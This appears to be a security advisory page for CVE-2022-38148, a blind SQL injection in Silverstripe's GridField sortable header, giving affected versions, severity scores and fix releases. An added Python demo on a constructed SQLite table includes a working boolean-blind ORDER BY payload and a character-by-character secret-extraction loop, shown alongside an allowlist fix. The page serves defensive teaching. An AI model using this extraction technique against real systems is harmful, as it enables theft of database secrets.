CVE-2022-38148 – silverstripe/framework
Package
Manager: composer
Name: silverstripe/framework
Vulnerable Version: >=4.0.0 <4.10.11 || >=4.11.0 <4.11.14
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0.00219 (percentile 0.44465)
Details
Blind SQL Injection via GridFieldSortableHeader. GridField state is vulnerable to SQL injection, and the vast majority of GridFields in Silverstripe CMS are affected. An attacker with CMS access (hence PR:L in the vector) can execute an arbitrary SQL statement by placing an SQL payload in some parts of the GridField state, which the sortable header passes through to the database query. Per the vulnerable range above, the fix is in 4.10.11 for the 4.10 line and 4.11.14 for the 4.11 line; upgrade to one of those or later.
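The following is an added example written for this page, not code from Silverstripe or from the advisory, and it does not reproduce the GridField API. It models the bug class only: a grid's sort state (column name and direction) is concatenated into ORDER BY, which cannot be parameterised, so a payload in the "column" is executed; the ordering of the result then acts as a boolean oracle for blind extraction. The table names, columns, the secret token and the allowlist are all constructed assumptions for illustration. The hardened sorter beside it shows the practical fix for this class: validate the identifier against the grid's own sortable columns and the direction against a fixed set before building the query.

```python
"""Bug class behind CVE-2022-38148, illustrated on a constructed SQLite table.

Added example, not Silverstripe code. Names (pages, members, token, the
allowlists) are assumptions chosen for the demonstration.
"""
import sqlite3

# Assumption: the grid exposes exactly these sortable columns.
ALLOWED_SORT_COLUMNS = {"id", "title", "created"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def make_db():
    """Constructed sample data: a 'pages' grid and a 'members' table holding
    a secret the attacker wants to read through the blind channel."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, created TEXT);
        INSERT INTO pages VALUES (1, 'Home',    '2020-01-01'),
                                 (2, 'About',   '2021-01-01'),
                                 (3, 'Contact', '2022-01-01');
        CREATE TABLE members (id INTEGER PRIMARY KEY, email TEXT, token TEXT);
        INSERT INTO members VALUES (1, 'admin@example.com', 'secret');
        """
    )
    return conn


def sorted_ids_vulnerable(conn, sort_column, direction):
    """Vulnerable pattern: grid state is interpolated straight into the SQL.
    ORDER BY takes identifiers, not bound values, so there is no parameter
    to hide behind; whatever is in sort_column is evaluated by the database."""
    sql = f"SELECT id FROM pages ORDER BY {sort_column} {direction}"
    return [row[0] for row in conn.execute(sql)]


def sorted_ids_safe(conn, sort_column, direction):
    """Hardened pattern: reject any column that is not one the grid itself
    declares sortable, and any direction outside asc/desc, before building SQL."""
    if sort_column not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsortable column: {sort_column!r}")
    direction = direction.lower()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"bad sort direction: {direction!r}")
    sql = f'SELECT id FROM pages ORDER BY "{sort_column}" {direction}'
    return [row[0] for row in conn.execute(sql)]


def is_rejected(conn, sort_column, direction):
    """True if the hardened sorter refuses the given grid state."""
    try:
        sorted_ids_safe(conn, sort_column, direction)
    except ValueError:
        return True
    return False


def blind_oracle_payload(guess):
    """Boolean-based blind payload placed in the sort column. If the guessed
    prefix of the admin token is right the rows come back ordered by id,
    otherwise by title; the attacker reads the secret from the row order."""
    return (
        "(CASE WHEN (SELECT substr(token, 1, {n}) FROM members WHERE id = 1)"
        " = '{g}' THEN id ELSE title END)"
    ).format(n=len(guess), g=guess.replace("'", "''"))


def extract_token(conn, alphabet="abcdefghijklmnopqrstuvwxyz", max_len=8):
    """Drive the ordering oracle against the vulnerable sorter, one character
    at a time, until no candidate character extends the recovered prefix."""
    recovered = ""
    for _ in range(max_len):
        for ch in alphabet:
            ids = sorted_ids_vulnerable(conn, blind_oracle_payload(recovered + ch), "asc")
            if ids == [1, 2, 3]:  # ordered by id: the CASE condition held
                recovered += ch
                break
        else:
            break  # nothing matched: end of the secret
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("recovered via blind ordering oracle:", extract_token(db))
    print("hardened sorter rejects payload:", is_rejected(db, blind_oracle_payload("s"), "asc"))
```

The oracle never sees the secret in any response body; it only sees whether the grid came back sorted by id or by title, which is why the advisory calls this a blind injection and why rate or error monitoring alone will not catch it. The hardened version still builds the ORDER BY by string formatting, because that is unavoidable for identifiers; what makes it safe is that the only strings that can reach it are members of a closed set the application controls.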
Metadata
Created: 2022-11-22T00:00:07Z
Modified: 2025-04-30T20:39:16Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/11/GHSA-rr8h-f97q-8p9c/GHSA-rr8h-f97q-8p9c.json
CWE IDs: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command, 'SQL Injection')
Alternative ID: GHSA-rr8h-f97q-8p9c
Finding: F297
Auto approve: 1